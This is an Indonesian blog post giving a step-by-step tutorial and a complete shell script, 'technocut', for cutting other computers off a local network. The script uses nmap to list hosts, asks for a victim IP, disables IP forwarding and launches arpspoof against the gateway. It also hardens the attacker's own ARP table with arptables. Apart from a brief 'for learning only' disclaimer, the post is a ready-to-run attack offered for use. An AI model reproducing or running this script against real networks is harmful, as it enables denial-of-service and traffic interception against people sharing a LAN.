Attacking Network Dengan Technocut

Mungkin kita sudah pernah dengar dengan software netcut di windows, yaitu tools jaringan yang digunakan untuk membuat konflik ip address dalam sebuah jaringan. Serangan ini cukup fatal sehingga komputer yang terkena serangan ini seakan akan putus dari jaringan, dan kadang bisa sampai hang.
Di linux versi desktop ada pula tools serupa dengan netcut di windows, namanya tuxcut cara kerjanya hampir sama. Kali ini yang saya bahas disini adalah technocut , yaitu netcut dengan basis shell/text.

Nb: ingat hanya untuk sebatas pembelajaran!!! Resiko silakan tanggung sendiri.

Install dulu paket pendukungnya (arptables, dsniff, nmap):


#apt-get install arptables dsniff nmap

Copy dan simpan dengan nama technocut.sh scrip di bawah ini:

#nano /home/sonny/technocut.sh

-------------------------------------------------------------------------------------
#!/bin/sh
# 21-03-2010 bertapa di TLab
# kebutuhan program:
# - arptables
# - dsniff
# - nmap
#
# Promram ini mesti dijalankan dengan hak akses root.

inTER="`ip route list | grep "default" | cut -d " " -s -f 5`"
awakMAC="`ip addr show dev $inTER | awk '/ether/{ print $2 }'`"
gwIP="`ip route list | grep "default" | cut -d" " -f3`"
gwMAC=`arping -I $inTER -f $gwIP | grep "Unicast" | cut -d" " -f5 | cut -d"[" -f2 | cut -d"]" -f1`
awakIP="`ifconfig | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`" > /dev/null
clear
echo "====================================================="
echo "| |"
echo "| TechnoCut V0,1 Beta |"
echo "| Created By Novizul Evendi |"
echo "| |"
echo "| Web : http://www.techno-os.net |"
echo "| Email: karuwak@techno-os.net |"
echo "| Note : Ingat Hanya sebatas pembelajaran!! |"
echo "| |"
echo "====================================================="
echo "Info System: IP=$awakIP, MAC=$awakMAC, GW=$gwIP, LanCard=$inTER"
echo "================================================================"
echo ""
echo "Protek dluw System Qta"
echo "-------------- --------"
`arptables -A IN -s $gwIP --source-mac $gwMAC -j ACCEPT`
echo "arptables -A IN -s $gwIP --source-mac $gwMAC -j ACCEPT"
`arptables -A OUT -d $gwIP --target-mac $gwMAC -j ACCEPT`
echo "arptables -A OUT -d $gwIP --target-mac $gwMAC -j ACCEPT"
`arp -s $gwIP $gwMAC`
echo "arp -s $gwIP $gwMAC"

echo ""
echo "scan jaringan $gwIP/24 Dluw ya"
echo "--------------------------------------"
nmap -sP $gwIP/24 | grep "[0-9].[0-9].[0-9].[0-9]"
echo ""

echo "Masukkan IP target yang diinginkan:"
echo "------------------------------------"
read vicip
echo "Attacking $vicip"
echo 0 > /proc/sys/net/ipv4/ip_forward
`arpspoof -i $inTER -t $gwIP $vicip &>/dev/null &`
clear
echo "Serangan melalui $inTER ke $vicip diluncurkan"
echo ""
read -p "Untuk memberhentikan serangan, tekan Enter"
clear
echo "Target sudah normal lagi"
echo 1 > /proc/sys/net/ipv4/ip_forward
killall arpspoof
`arptables -P IN ACCEPT && arptables -P OUT ACCEPT && arptables -F`
echo ""
echo ""

-------------------------------------------------------------------------------------

Selanjutnya kenali network anda, contoh disini saya pakai ip address 192.168.1.10 dengan interface eth0, maka edit kembali script diatas untuk me”replace” $inTER dan $gwIP

#nano /home/sonny/technocut.sh

Untuk replace gunakan ctrl + w, kemudian tekan tombol insert. Ganti $inTER dengan eth0 (sesuaikan dengan interface anda bila yang terdeteksi eth1 maka ganti dengan eth1). Ganti $gwIP dengan 192.168.1.0 (sesuaikan dengan network anda).

Kalau sudah simpan dan keluar dari editor.

Disini kita sudah siap untuk melakukan attacking
Jalankan technocut.sh

#sh /home/sonny/technocut.sh

Screenshoot:


reference
credit to novizul evendi

No comments:

Post a Comment

Related Posts with Thumbnails